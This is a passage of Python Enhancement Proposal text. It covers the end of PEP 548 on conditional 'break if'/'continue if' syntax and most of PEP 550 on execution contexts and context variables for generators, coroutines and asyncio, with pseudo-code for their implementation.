duplicated outside the loop, as setup code that executes once
before entering the loop:<setup code>
while <condition>:
<loop body>
<setup code>
That PEP was rejected because no syntax was found that was superior
to the following form:
while True:
<setup code>
if not <condition>:
break
<loop body>
This PEP proposes a superior form, one that also has application to
for loops. It is superior because it makes the flow of control in
loops more explicit, while preserving Python’s indentation aesthetic.
Syntax
The syntax of the break and continue statements is extended
as follows:
break_stmt : "break" ["if" expression]
continue_stmt : "continue" ["if" expression]
In addition, the syntax of the while statement is modified as follows:
while_stmt : while1_stmt|while2_stmt
while1_stmt : "while" expression ":" suite
["else" ":" suite]
while2_stmt : "while" ":" suite
Semantics
A break if or continue if is executed if and only if
expression evaluates to true.
A while statement with no expression loops until a break or return
is executed (or an error is raised), as if it were a while True
statement. Given that the loop can never terminate except in a
way that would not cause an else suite to execute, no else
suite is allowed in the expressionless form. If practical, it
should also be an error if the body of an expressionless while
does not contain at least one break or return statement.
Justification and Examples
The previous “best possible” form:
while True:
<setup code>
if not <condition>:
break
<loop body>
could be formatted as:
while True:
<setup code>
if not <condition>: break
<loop body>
This is superficially almost identical to the form proposed by this
PEP:
while:
<setup code>
break if not <condition>
<loop body>
The significant difference here is that the loop flow control
keyword appears first in the line of code. This makes it easier
to comprehend the flow of control in the loop at a glance, especially
when reading colorized code.
For example, this is a common code pattern, taken in this case
from the tarfile module:
while True:
buf = self._read(self.bufsize)
if not buf:
break
t.append(buf)
Reading this, we either see the break and possibly need to think about
where the while is that it applies to, since the break is indented
under the if, and then track backward to read the condition that
triggers it; or, we read the condition and only afterward discover
that this condition changes the flow of the loop.
With the new syntax this becomes:
while:
buf = self._read(self.bufsize)
break if not buf
t.append(buf)
Reading this we first see the break, which obviously applies to
the while since it is at the same level of indentation as the loop
body, and then we read the condition that causes the flow of control
to change.
Further, consider a more complex example from sre_parse:
while True:
c = self.next
self.__next()
if c is None:
if not result:
raise self.error("missing group name")
raise self.error("missing %s, unterminated name" % terminator,
len(result))
if c == terminator:
if not result:
raise self.error("missing group name", 1)
break
result += c
return result
This is the natural way to write this code given current Python
loop control syntax. However, given break if, it would be more
natural to write this as follows:
while:
c = self.next
self.__next()
break if c is None or c == terminator
result += c
if not result:
raise self.error("missing group name")
elif c is None:
raise self.error("missing %s, unterminated name" % terminator,
len(result))
return result
This form moves the error handling out of the loop body, leaving the
loop logic much more understandable. While it would certainly be
possible to write the code this way using the current syntax, the
proposed syntax makes it more natural to write it in the clearer form.
The proposed syntax also provides a natural, Pythonic spelling of
the classic repeat ... until <expression> construct found in
other languages, and for which no good syntax has previously been
found for Python:
while:
...
break if <expression>
The tarfile module, for example, has a couple of “read until” loops like
the following:
while True:
s = self.__read(1)
if not s or s == NUL:
break
With the new syntax this would read more clearly:
while:
s = self.__read(1)
break if not s or s == NUL
The case for extending this syntax to continue is less strong,
but buttressed by the value of consistency.
It is much more common for a continue statement to be at the
end of a multiline if suite, such as this example from zipfile:
while True:
try:
self.fp = io.open(file, filemode)
except OSError:
if filemode in modeDict:
filemode = modeDict[filemode]
continue
raise
break
The only opportunity for improvement the new syntax would offer for
this loop would be the omission of the True token.
On the other hand, consider this example from uuid.py:
for i in range(adapters.length):
ncb.Reset()
ncb.Command = netbios.NCBRESET
ncb.Lana_num = ord(adapters.lana[i])
if win32wnet.Netbios(ncb) != 0:
continue
ncb.Reset()
ncb.Command = netbios.NCBASTAT
ncb.Lana_num = ord(adapters.lana[i])
ncb.Callname = '*'.ljust(16)
ncb.Buffer = status = netbios.ADAPTER_STATUS()
if win32wnet.Netbios(ncb) != 0:
continue
status._unpack()
bytes = status.adapter_address[:6]
if len(bytes) != 6:
continue
return int.from_bytes(bytes, 'big')
This becomes:
for i in range(adapters.length):
ncb.Reset()
ncb.Command = netbios.NCBRESET
ncb.Lana_num = ord(adapters.lana[i])
continue if win32wnet.Netbios(ncb) != 0
ncb.Reset()
ncb.Command = netbios.NCBASTAT
ncb.Lana_num = ord(adapters.lana[i])
ncb.Callname = '*'.ljust(16)
ncb.Buffer = status = netbios.ADAPTER_STATUS()
continue if win32wnet.Netbios(ncb) != 0
status._unpack()
bytes = status.adapter_address[:6]
continue if len(bytes) != 6
return int.from_bytes(bytes, 'big')
This example indicates that there are non-trivial use cases where
continue if also improves the readability of the loop code.
It is probably significant to note that all of the examples selected
for this PEP were found by grepping the standard library for while
True and continue, and the relevant examples were found in
the first four modules inspected.
Copyright
This document is placed in the public domain.
| Rejected | PEP 548 – More Flexible Loop Control | Standards Track | This PEP proposes enhancing the break and continue statements
with an optional boolean expression that controls whether or not
they execute. This allows the flow of control in loops to be
expressed more clearly and compactly. |
PEP 550 – Execution Context
Author:
Yury Selivanov <yury at edgedb.com>,
Elvis Pranskevichus <elvis at edgedb.com>
Status:
Withdrawn
Type:
Standards Track
Created:
11-Aug-2017
Python-Version:
3.7
Post-History:
11-Aug-2017, 15-Aug-2017, 18-Aug-2017, 25-Aug-2017,
01-Sep-2017
Table of Contents
Abstract
PEP Status
Rationale
Goals
High-Level Specification
Regular Single-threaded Code
Multithreaded Code
Generators
Coroutines and Asynchronous Tasks
Detailed Specification
Generators
contextlib.contextmanager
Enumerating context vars
coroutines
Asynchronous Generators
asyncio
Generators Transformed into Iterators
Implementation
Logical Context
Context Variables
Performance Considerations
Summary of the New APIs
Python
C API
Design Considerations
Should “yield from” leak context changes?
Should PyThreadState_GetDict() use the execution context?
PEP 521
Can Execution Context be implemented without modifying CPython?
Should we update sys.displayhook and other APIs to use EC?
Greenlets
Context manager as the interface for modifications
Setting and restoring context variables
Alternative Designs for ContextVar API
Logical Context with stacked values
ContextVar “set/reset”
Backwards Compatibility
Rejected Ideas
Replication of threading.local() interface
Coroutines not leaking context changes by default
Appendix: HAMT Performance Analysis
Acknowledgments
Version History
References
Copyright
Abstract
This PEP adds a new generic mechanism of ensuring consistent access
to non-local state in the context of out-of-order execution, such
as in Python generators and coroutines.
Thread-local storage, such as threading.local(), is inadequate for
programs that execute concurrently in the same OS thread. This PEP
proposes a solution to this problem.
PEP Status
Due to its breadth and the lack of general consensus on some aspects, this
PEP has been withdrawn and superseded by a simpler PEP 567, which has
been accepted and included in Python 3.7.
PEP 567 implements the same core idea, but limits the ContextVar support
to asynchronous tasks while leaving the generator behavior untouched.
The latter may be revisited in a future PEP.
Rationale
Prior to the advent of asynchronous programming in Python, programs
used OS threads to achieve concurrency. The need for thread-specific
state was solved by threading.local() and its C-API equivalent,
PyThreadState_GetDict().
A few examples of where Thread-local storage (TLS) is commonly
relied upon:
Context managers like decimal contexts, numpy.errstate,
and warnings.catch_warnings.
Request-related data, such as security tokens and request
data in web applications, language context for gettext etc.
Profiling, tracing, and logging in large code bases.
Unfortunately, TLS does not work well for programs which execute
concurrently in a single thread. A Python generator is the simplest
example of a concurrent program. Consider the following:
def fractions(precision, x, y):
with decimal.localcontext() as ctx:
ctx.prec = precision
yield Decimal(x) / Decimal(y)
yield Decimal(x) / Decimal(y ** 2)
g1 = fractions(precision=2, x=1, y=3)
g2 = fractions(precision=6, x=2, y=3)
items = list(zip(g1, g2))
The intuitively expected value of items is:
[(Decimal('0.33'), Decimal('0.666667')),
(Decimal('0.11'), Decimal('0.222222'))]
Rather surprisingly, the actual result is:
[(Decimal('0.33'), Decimal('0.666667')),
(Decimal('0.111111'), Decimal('0.222222'))]
This is because the implicit Decimal context is stored as a thread-local,
so concurrent iteration of the fractions() generator would
corrupt the state. For Decimal, specifically, the only current
workaround is to use explicit context method calls for all arithmetic
operations [28]. Arguably, this defeats the usefulness of overloaded
operators and makes even simple formulas hard to read and write.
Coroutines are another class of Python code where TLS unreliability
is a significant issue.
The inadequacy of TLS in asynchronous code has led to the
proliferation of ad-hoc solutions, which are limited in scope and
do not support all required use cases.
The current status quo is that any library (including the standard
library) that relies on TLS is likely to be broken when used in
asynchronous code or with generators (see [3] as an example issue).
Some languages that support coroutines or generators recommend
passing the context manually as an argument to every function; see
[1] for an example. This approach, however, has limited use for
Python, where there is a large ecosystem that was built to work with
a TLS-like context. Furthermore, libraries like decimal or
numpy rely on context implicitly in overloaded operator
implementations.
The .NET runtime, which has support for async/await, has a generic
solution for this problem, called ExecutionContext (see [2]).
Goals
The goal of this PEP is to provide a more reliable
threading.local() alternative, which:
provides the mechanism and the API to fix non-local state issues
with coroutines and generators;
implements TLS-like semantics for synchronous code, so that
users like decimal and numpy can switch to the new
mechanism with minimal risk of breaking backwards compatibility;
has no or negligible performance impact on the existing code or
the code that will be using the new mechanism, including
C extensions.
High-Level Specification
The full specification of this PEP is broken down into three parts:
High-Level Specification (this section): the description of the
overall solution. We show how it applies to generators and
coroutines in user code, without delving into implementation
details.
Detailed Specification: the complete description of new concepts,
APIs, and related changes to the standard library.
Implementation Details: the description and analysis of data
structures and algorithms used to implement this PEP, as well as
the necessary changes to CPython.
For the purpose of this section, we define execution context as an
opaque container of non-local state that allows consistent access to
its contents in the concurrent execution environment.
A context variable is an object representing a value in the
execution context. A call to contextvars.ContextVar(name)
creates a new context variable object. A context variable object has
three methods:
get(): returns the value of the variable in the current
execution context;
set(value): sets the value of the variable in the current
execution context;
delete(): can be used for restoring variable state; its
purpose and semantics are explained in
Setting and restoring context variables.
Regular Single-threaded Code
In regular, single-threaded code that doesn’t involve generators or
coroutines, context variables behave like globals:
var = contextvars.ContextVar('var')
def sub():
assert var.get() == 'main'
var.set('sub')
def main():
var.set('main')
sub()
assert var.get() == 'sub'
Multithreaded Code
In multithreaded code, context variables behave like thread locals:
var = contextvars.ContextVar('var')
def sub():
assert var.get() is None # The execution context is empty
# for each new thread.
var.set('sub')
def main():
var.set('main')
thread = threading.Thread(target=sub)
thread.start()
thread.join()
assert var.get() == 'main'
Generators
Unlike regular function calls, generators can cooperatively yield
their control of execution to the caller. Furthermore, a generator
does not control where the execution would continue after it yields.
It may be resumed from an arbitrary code location.
For these reasons, the least surprising behaviour of generators is
as follows:
changes to context variables are always local and are not visible
in the outer context, but are visible to the code called by the
generator;
once set in the generator, the context variable is guaranteed not
to change between iterations;
changes to context variables in outer context (where the generator
is being iterated) are visible to the generator, unless these
variables were also modified inside the generator.
Let’s review:
var1 = contextvars.ContextVar('var1')
var2 = contextvars.ContextVar('var2')
def gen():
var1.set('gen')
assert var1.get() == 'gen'
assert var2.get() == 'main'
yield 1
# Modification to var1 in main() is shielded by
# gen()'s local modification.
assert var1.get() == 'gen'
# But modifications to var2 are visible
assert var2.get() == 'main modified'
yield 2
def main():
g = gen()
var1.set('main')
var2.set('main')
next(g)
# Modification of var1 in gen() is not visible.
assert var1.get() == 'main'
var1.set('main modified')
var2.set('main modified')
next(g)
Now, let’s revisit the decimal precision example from the Rationale
section, and see how the execution context can improve the situation:
import decimal
# create a new context var
decimal_ctx = contextvars.ContextVar('decimal context')
# Pre-PEP 550 Decimal relies on TLS for its context.
# For illustration purposes, we monkey-patch the decimal
# context functions to use the execution context.
# A real working fix would need to properly update the
# C implementation as well.
def patched_setcontext(context):
decimal_ctx.set(context)
def patched_getcontext():
ctx = decimal_ctx.get()
if ctx is None:
ctx = decimal.Context()
decimal_ctx.set(ctx)
return ctx
decimal.setcontext = patched_setcontext
decimal.getcontext = patched_getcontext
def fractions(precision, x, y):
with decimal.localcontext() as ctx:
ctx.prec = precision
yield MyDecimal(x) / MyDecimal(y)
yield MyDecimal(x) / MyDecimal(y ** 2)
g1 = fractions(precision=2, x=1, y=3)
g2 = fractions(precision=6, x=2, y=3)
items = list(zip(g1, g2))
The value of items is:
[(Decimal('0.33'), Decimal('0.666667')),
(Decimal('0.11'), Decimal('0.222222'))]
which matches the expected result.
Coroutines and Asynchronous Tasks
Like generators, coroutines can yield and regain control. The major
difference from generators is that coroutines do not yield to the
immediate caller. Instead, the entire coroutine call stack
(coroutines chained by await) switches to another coroutine call
stack. In this regard, await-ing on a coroutine is conceptually
similar to a regular function call, and a coroutine chain
(or a “task”, e.g. an asyncio.Task) is conceptually similar to a
thread.
From this similarity we conclude that context variables in coroutines
should behave like “task locals”:
changes to context variables in a coroutine are visible to the
coroutine that awaits on it;
changes to context variables made in the caller prior to awaiting
are visible to the awaited coroutine;
changes to context variables made in one task are not visible in
other tasks;
tasks spawned by other tasks inherit the execution context from the
parent task, but any changes to context variables made in the
parent task after the child task was spawned are not visible.
The last point shows behaviour that is different from OS threads.
OS threads do not inherit the execution context by default.
There are two reasons for this: common usage intent and backwards
compatibility.
The main reason for why tasks inherit the context, and threads do
not, is the common usage intent. Tasks are often used for relatively
short-running operations which are logically tied to the code that
spawned the task (like running a coroutine with a timeout in
asyncio). OS threads, on the other hand, are normally used for
long-running, logically separate code.
With respect to backwards compatibility, we want the execution context
to behave like threading.local(). This is so that libraries can
start using the execution context in place of TLS with a lesser risk
of breaking compatibility with existing code.
Let’s review a few examples to illustrate the semantics we have just
defined.
Context variable propagation in a single task:
import asyncio
var = contextvars.ContextVar('var')
async def main():
var.set('main')
await sub()
# The effect of sub() is visible.
assert var.get() == 'sub'
async def sub():
assert var.get() == 'main'
var.set('sub')
assert var.get() == 'sub'
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
Context variable propagation between tasks:
import asyncio
var = contextvars.ContextVar('var')
async def main():
var.set('main')
loop.create_task(sub()) # schedules asynchronous execution
# of sub().
assert var.get() == 'main'
var.set('main changed')
async def sub():
# Sleeping will make sub() run after
# "var" is modified in main().
await asyncio.sleep(1)
# The value of "var" is inherited from main(), but any
# changes to "var" made in main() after the task
# was created are *not* visible.
assert var.get() == 'main'
# This change is local to sub() and will not be visible
# to other tasks, including main().
var.set('sub')
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
As shown above, changes to the execution context are local to the
task, and tasks get a snapshot of the execution context at the point
of creation.
There is one narrow edge case when this can lead to surprising
behaviour. Consider the following example where we modify the
context variable in a nested coroutine:
async def sub(var_value):
await asyncio.sleep(1)
var.set(var_value)
async def main():
var.set('main')
# waiting for sub() directly
await sub('sub-1')
# var change is visible
assert var.get() == 'sub-1'
# waiting for sub() with a timeout;
await asyncio.wait_for(sub('sub-2'), timeout=2)
# wait_for() creates an implicit task, which isolates
# context changes, which means that the below assertion
# will fail.
assert var.get() == 'sub-2' # AssertionError!
However, relying on context changes leaking to the caller is
ultimately a bad pattern. For this reason, the behaviour shown in
the above example is not considered a major issue and can be
addressed with proper documentation.
Detailed Specification
Conceptually, an execution context (EC) is a stack of logical
contexts. There is always exactly one active EC per Python thread.
A logical context (LC) is a mapping of context variables to their
values in that particular LC.
A context variable is an object representing a value in the
execution context. A new context variable object is created by
calling contextvars.ContextVar(name: str). The value of the
required name argument is not used by the EC machinery, but may
be used for debugging and introspection.
The context variable object has the following methods and attributes:
name: the value passed to ContextVar().
get(*, topmost=False, default=None): if topmost is False
(the default), traverses the execution context top-to-bottom, until
the variable value is found. If topmost is True, returns
the value of the variable in the topmost logical context.
If the variable value was not found, returns the value of default.
set(value): sets the value of the variable in the topmost
logical context.
delete(): removes the variable from the topmost logical context.
Useful when restoring the logical context to the state prior to the
set() call, for example, in a context manager, see
Setting and restoring context variables for more information.
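To make the difference between a full lookup and a topmost-only lookup
concrete, here is a short illustration written against the API proposed
above (because this PEP was withdrawn, the snippet does not run on
current Python; it only spells out the intended semantics):
import contextvars

var = contextvars.ContextVar('var')

def gen():
    # The generator's own (topmost) logical context starts out empty:
    # a full lookup finds the outer value, while a topmost-only lookup
    # misses and falls back to the default.
    assert var.get() == 'outer'
    assert var.get(topmost=True, default='missing') == 'missing'
    var.set('inner')  # set() always writes to the topmost logical context
    assert var.get(topmost=True) == 'inner'
    yield

def main():
    var.set('outer')
    list(gen())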
Generators
When created, each generator object has an empty logical context
object stored in its __logical_context__ attribute. This logical
context is pushed onto the execution context at the beginning of each
generator iteration and popped at the end:
var1 = contextvars.ContextVar('var1')
var2 = contextvars.ContextVar('var2')
def gen():
var1.set('var1-gen')
var2.set('var2-gen')
# EC = [
# outer_LC(),
# gen_LC({var1: 'var1-gen', var2: 'var2-gen'})
# ]
n = nested_gen() # nested_gen_LC is created
next(n)
# EC = [
# outer_LC(),
# gen_LC({var1: 'var1-gen', var2: 'var2-gen'})
# ]
var1.set('var1-gen-mod')
var2.set('var2-gen-mod')
# EC = [
# outer_LC(),
# gen_LC({var1: 'var1-gen-mod', var2: 'var2-gen-mod'})
# ]
next(n)
def nested_gen():
# EC = [
# outer_LC(),
# gen_LC({var1: 'var1-gen', var2: 'var2-gen'}),
# nested_gen_LC()
# ]
assert var1.get() == 'var1-gen'
assert var2.get() == 'var2-gen'
var1.set('var1-nested-gen')
# EC = [
# outer_LC(),
# gen_LC({var1: 'var1-gen', var2: 'var2-gen'}),
# nested_gen_LC({var1: 'var1-nested-gen'})
# ]
yield
# EC = [
# outer_LC(),
# gen_LC({var1: 'var1-gen-mod', var2: 'var2-gen-mod'}),
# nested_gen_LC({var1: 'var1-nested-gen'})
# ]
assert var1.get() == 'var1-nested-gen'
assert var2.get() == 'var2-gen-mod'
yield
# EC = [outer_LC()]
g = gen() # gen_LC is created for the generator object `g`
list(g)
# EC = [outer_LC()]
The snippet above shows the state of the execution context stack
throughout the generator lifespan.
contextlib.contextmanager
The contextlib.contextmanager() decorator can be used to turn
a generator into a context manager. A context manager that
temporarily modifies the value of a context variable could be defined
like this:
var = contextvars.ContextVar('var')
@contextlib.contextmanager
def var_context(value):
original_value = var.get()
try:
var.set(value)
yield
finally:
var.set(original_value)
Unfortunately, this would not work straight away, as the modification
to the var variable is confined to the var_context()
generator, and therefore will not be visible inside the with
block:
def func():
# EC = [{}, {}]
with var_context(10):
# EC becomes [{}, {}, {var: 10}] in the
# *var_context()* generator,
# but here the EC is still [{}, {}]
assert var.get() == 10 # AssertionError!
The way to fix this is to set the generator’s __logical_context__
attribute to None. This will cause the generator to avoid
modifying the execution context stack.
We modify the contextlib.contextmanager() decorator to
set genobj.__logical_context__ to None to produce
well-behaved context managers:
def func():
# EC = [{}, {}]
with var_context(10):
# EC = [{}, {var: 10}]
assert var.get() == 10
# EC becomes [{}, {var: None}]
Enumerating context vars
The ExecutionContext.vars() method returns a list of
ContextVar objects that have values in the execution context.
This method is mostly useful for introspection and logging.
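For example, a debugging or logging helper could use it to dump every
variable that has a value in the current execution context (again
written against the proposed API, so purely illustrative):
import contextvars

def dump_context_vars():
    # Introspection helper: print the name and current value of every
    # context variable that is set somewhere in the execution context.
    ec = contextvars.get_execution_context()
    for var in ec.vars():
        print(var.name, '=', repr(var.get()))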
coroutines
In CPython, coroutines share the implementation with generators.
The difference is that in coroutines __logical_context__ defaults
to None. This affects both the async def coroutines and the
old-style generator-based coroutines (generators decorated with
@types.coroutine).
Asynchronous Generators
The execution context semantics of asynchronous generators do not
differ from those of regular generators.
asyncio
asyncio uses Loop.call_soon, Loop.call_later,
and Loop.call_at to schedule the asynchronous execution of a
function. asyncio.Task uses call_soon() to run the
wrapped coroutine.
We modify Loop.call_{at,later,soon} to accept the new
optional execution_context keyword argument, which defaults to
the copy of the current execution context:
def call_soon(self, callback, *args, execution_context=None):
if execution_context is None:
execution_context = contextvars.get_execution_context()
# ... some time later
contextvars.run_with_execution_context(
execution_context, callback, args)
The contextvars.get_execution_context() function returns a
shallow copy of the current execution context. By shallow copy here
we mean a new execution context such that:
lookups in the copy provide the same results as in the original
execution context, and
any changes in the original execution context do not affect the
copy, and
any changes to the copy do not affect the original execution
context.
Either of the following satisfies the copy requirements:
a new stack with shallow copies of logical contexts;
a new stack with one squashed logical context.
The contextvars.run_with_execution_context(ec, func, *args,
**kwargs) function runs func(*args, **kwargs) with ec as the
execution context. The function performs the following steps:
Set ec as the current execution context stack in the current
thread.
Push an empty logical context onto the stack.
Run func(*args, **kwargs).
Pop the logical context from the stack.
Restore the original execution context stack.
Return or raise the func() result.
These steps ensure that ec cannot be modified by func,
which makes run_with_execution_context() idempotent.
asyncio.Task is modified as follows:
class Task:
def __init__(self, coro):
...
# Get the current execution context snapshot.
self._exec_context = contextvars.get_execution_context()
# Create an empty Logical Context that will be
# used by coroutines run in the task.
coro.__logical_context__ = contextvars.LogicalContext()
self._loop.call_soon(
self._step,
execution_context=self._exec_context)
def _step(self, exc=None):
...
self._loop.call_soon(
self._step,
execution_context=self._exec_context)
...
Generators Transformed into Iterators
Any Python generator can be represented as an equivalent iterator.
Compilers like Cython rely on this axiom. With respect to the
execution context, such an iterator should behave the same way as the
generator it represents.
This means that there needs to be a Python API to create new logical
contexts and run code with a given logical context.
The contextvars.LogicalContext() function creates a new empty
logical context.
The contextvars.run_with_logical_context(lc, func, *args,
**kwargs) function can be used to run functions in the specified
logical context. The lc can be modified as a result of the call.
The contextvars.run_with_logical_context() function performs the
following steps:
Push lc onto the current execution context stack.
Run func(*args, **kwargs).
Pop lc from the execution context stack.
Return or raise the func() result.
By using LogicalContext() and run_with_logical_context(),
we can replicate the generator behaviour like this:
class Generator:
def __init__(self):
self.logical_context = contextvars.LogicalContext()
def __iter__(self):
return self
def __next__(self):
return contextvars.run_with_logical_context(
self.logical_context, self._next_impl)
def _next_impl(self):
# Actual __next__ implementation.
...
Let’s see how this pattern can be applied to an example generator:
# create a new context variable
var = contextvars.ContextVar('var')
def gen_series(n):
var.set(10)
for i in range(1, n):
yield var.get() * i
# gen_series is equivalent to the following iterator:
class CompiledGenSeries:
# This class is what the `gen_series()` generator can
# be transformed to by a compiler like Cython.
def __init__(self, n):
# Create a new empty logical context,
# like the generators do.
self.logical_context = contextvars.LogicalContext()
# Initialize the generator in its LC.
# Otherwise `var.set(10)` in the `_init` method
# would leak.
contextvars.run_with_logical_context(
self.logical_context, self._init, n)
def _init(self, n):
self.i = 1
self.n = n
var.set(10)
def __iter__(self):
return self
def __next__(self):
# Run the actual implementation of __next__ in our LC.
return contextvars.run_with_logical_context(
self.logical_context, self._next_impl)
def _next_impl(self):
if self.i == self.n:
raise StopIteration
result = var.get() * self.i
self.i += 1
return result
For hand-written iterators, such an approach to context management is
normally not necessary, and it is easier to set and restore
context variables directly in __next__:
class MyIterator:
# ...
def __next__(self):
old_val = var.get()
try:
var.set(new_val)
# ...
finally:
var.set(old_val)
Implementation
Execution context is implemented as an immutable linked list of
logical contexts, where each logical context is an immutable weak key
mapping. A pointer to the currently active execution context is
stored in the OS thread state:
+-----------------+
| | ec
| PyThreadState +-------------+
| | |
+-----------------+ |
|
ec_node ec_node ec_node v
+------+------+ +------+------+ +------+------+
| NULL | lc |<----| prev | lc |<----| prev | lc |
+------+--+---+ +------+--+---+ +------+--+---+
| | |
LC v LC v LC v
+-------------+ +-------------+ +-------------+
| var1: obj1 | | EMPTY | | var1: obj4 |
| var2: obj2 | +-------------+ +-------------+
| var3: obj3 |
+-------------+
The choice of the immutable list of immutable mappings as a
fundamental data structure is motivated by the need to efficiently
implement contextvars.get_execution_context(), which is to be
frequently used by asynchronous tasks and callbacks. When the EC is
immutable, get_execution_context() can simply copy the current
execution context by reference:
def get_execution_context(self):
return PyThreadState_Get().ec
Let’s review all possible context modification scenarios:
The ContextVar.set() method is called:
def ContextVar_set(self, val):
# See a more complete set() definition
# in the `Context Variables` section.
tstate = PyThreadState_Get()
top_ec_node = tstate.ec
top_lc = top_ec_node.lc
new_top_lc = top_lc.set(self, val)
tstate.ec = ec_node(
prev=top_ec_node.prev,
lc=new_top_lc)
The contextvars.run_with_logical_context() function is called, in
which case the passed logical context object is appended to the
execution context:
def run_with_logical_context(lc, func, *args, **kwargs):
tstate = PyThreadState_Get()
old_top_ec_node = tstate.ec
new_top_ec_node = ec_node(prev=old_top_ec_node, lc=lc)
try:
tstate.ec = new_top_ec_node
return func(*args, **kwargs)
finally:
tstate.ec = old_top_ec_node
The contextvars.run_with_execution_context() function is called, in
which case the current execution context is set to the passed
execution context with a new empty logical context appended to it:
def run_with_execution_context(ec, func, *args, **kwargs):
tstate = PyThreadState_Get()
old_top_ec_node = tstate.ec
new_lc = contextvars.LogicalContext()
new_top_ec_node = ec_node(prev=ec, lc=new_lc)
try:
tstate.ec = new_top_ec_node
return func(*args, **kwargs)
finally:
tstate.ec = old_top_ec_node
genobj.send(), genobj.throw(), or genobj.close() is called
on a genobj generator, in which case the logical context recorded
in genobj is pushed onto the stack:
PyGen_New(PyGenObject *gen):
if (gen.gi_code.co_flags &
(CO_COROUTINE | CO_ITERABLE_COROUTINE)):
# gen is an 'async def' coroutine, or a generator
# decorated with @types.coroutine.
gen.__logical_context__ = None
else:
# Non-coroutine generator
gen.__logical_context__ = contextvars.LogicalContext()
gen_send(PyGenObject *gen, ...):
tstate = PyThreadState_Get()
if gen.__logical_context__ is not None:
old_top_ec_node = tstate.ec
new_top_ec_node = ec_node(
prev=old_top_ec_node,
lc=gen.__logical_context__)
try:
tstate.ec = new_top_ec_node
return _gen_send_impl(gen, ...)
finally:
gen.__logical_context__ = tstate.ec.lc
tstate.ec = old_top_ec_node
else:
return _gen_send_impl(gen, ...)
Coroutines and asynchronous generators share the implementation
with generators, and the above changes apply to them as well.
In certain scenarios the EC may need to be squashed to limit the
size of the chain. For example, consider the following corner case:
async def repeat(coro, delay):
await coro()
await asyncio.sleep(delay)
loop.create_task(repeat(coro, delay))
async def ping():
print('ping')
loop = asyncio.get_event_loop()
loop.create_task(repeat(ping, 1))
loop.run_forever()
In the above code, the EC chain will grow as long as repeat() is
called. Each new task will call
contextvars.run_with_execution_context(), which will append a new
logical context to the chain. To prevent unbounded growth,
contextvars.get_execution_context() checks if the chain
is longer than a predetermined maximum, and if it is, squashes the
chain into a single LC:
def get_execution_context():
tstate = PyThreadState_Get()
if tstate.ec_len > EC_LEN_MAX:
squashed_lc = contextvars.LogicalContext()
node = tstate.ec
while node:
# The LC.merge() method does not replace
# existing keys.
squashed_lc = squashed_lc.merge(node.lc)
node = node.prev
return ec_node(prev=NULL, lc=squashed_lc)
else:
return tstate.ec
Logical Context
Logical context is an immutable weak key mapping which has the
following properties with respect to garbage collection:
ContextVar objects are strongly-referenced only from the
application code, not from any of the execution context machinery
or values they point to. This means that there are no reference
cycles that could extend their lifespan longer than necessary, or
prevent their collection by the GC.
Values put in the execution context are guaranteed to be kept
alive while there is a ContextVar key referencing them in
the thread.
If a ContextVar is garbage collected, all of its values will
be removed from all contexts, allowing them to be GCed if needed.
If an OS thread has ended its execution, its thread state will be
cleaned up along with its execution context, cleaning
up all values bound to all context variables in the thread.
As discussed earlier, we need contextvars.get_execution_context()
to be consistently fast regardless of the size of the execution
context, so logical context is necessarily an immutable mapping.
Choosing dict for the underlying implementation is suboptimal,
because LC.set() will cause dict.copy(), which is an O(N)
operation, where N is the number of items in the LC.
get_execution_context(), when squashing the EC, is an O(M)
operation, where M is the total number of context variable values
in the EC.
So, instead of dict, we choose Hash Array Mapped Trie (HAMT)
as the underlying implementation of logical contexts. (Scala and
Clojure use HAMT to implement high performance immutable collections
[5], [6].)
With HAMT .set() becomes an O(log N) operation, and
get_execution_context() squashing is more efficient on average due
to structural sharing in HAMT.
See Appendix: HAMT Performance Analysis for a more elaborate
analysis of HAMT performance compared to dict.
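Independent of the underlying data structure, the contract expected
from the logical context mapping can be illustrated with a small,
runnable stand-in (a toy model only: it uses dict.copy(), so its set()
is O(N) where a HAMT would be O(log N)):
class ToyImmutableMapping:
    # Minimal model of the immutable-mapping contract assumed by
    # logical contexts: set() never mutates, it returns a new mapping.
    def __init__(self, data=None):
        self._data = dict(data or {})

    def set(self, key, value):
        new_data = self._data.copy()  # O(N); a HAMT avoids the full copy
        new_data[key] = value
        return ToyImmutableMapping(new_data)

    def get(self, key, default=None):
        return self._data.get(key, default)

lc1 = ToyImmutableMapping()
lc2 = lc1.set('var', 'value')
assert lc1.get('var') is None       # the original mapping is unchanged
assert lc2.get('var') == 'value'    # the new mapping carries the update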
Context Variables
The ContextVar.get() and ContextVar.set() methods are
implemented as follows (in pseudo-code):
class ContextVar:
def get(self, *, default=None, topmost=False):
tstate = PyThreadState_Get()
ec_node = tstate.ec
while ec_node:
if self in ec_node.lc:
return ec_node.lc[self]
if topmost:
break
ec_node = ec_node.prev
return default
def set(self, value):
tstate = PyThreadState_Get()
top_ec_node = tstate.ec
if top_ec_node is not None:
top_lc = top_ec_node.lc
new_top_lc = top_lc.set(self, value)
tstate.ec = ec_node(
prev=top_ec_node.prev,
lc=new_top_lc)
else:
# First ContextVar.set() in this OS thread.
top_lc = contextvars.LogicalContext()
new_top_lc = top_lc.set(self, value)
tstate.ec = ec_node(
prev=NULL,
lc=new_top_lc)
def delete(self):
tstate = PyThreadState_Get()
top_ec_node = tstate.ec
if top_ec_node is None:
raise LookupError
top_lc = top_ec_node.lc
if self not in top_lc:
raise LookupError
new_top_lc = top_lc.delete(self)
tstate.ec = ec_node(
prev=top_ec_node.prev,
lc=new_top_lc)
For efficient access in performance-sensitive code paths, such as in
numpy and decimal, we cache lookups in ContextVar.get(),
making it an O(1) operation when the cache is hit. The cache key is
composed from the following:
The new uint64_t PyThreadState->unique_id, which is a globally
unique thread state identifier. It is computed from the new
uint64_t PyInterpreterState->ts_counter, which is incremented
whenever a new thread state is created.
The new uint64_t PyThreadState->stack_version, which is a
thread-specific counter, which is incremented whenever a non-empty
logical context is pushed onto the stack or popped from the stack.
The uint64_t ContextVar->version counter, which is incremented
whenever the context variable value is changed in any logical
context in any OS thread.
The cache is then implemented as follows:
class ContextVar:
def set(self, value):
... # implementation
self.version += 1
def get(self, *, default=None, topmost=False):
if topmost:
return self._get_uncached(
default=default, topmost=topmost)
tstate = PyThreadState_Get()
if (self.last_tstate_id == tstate.unique_id and
self.last_stack_version == tstate.stack_version and
self.last_version == self.version):
return self.last_value
value = self._get_uncached(default=default)
self.last_value = value # borrowed ref
self.last_tstate_id = tstate.unique_id
self.last_stack_version = tstate.stack_version
self.last_version = self.version
return value
Note that last_value is a borrowed reference. We assume that
if the version checks are fine, the value object will be alive.
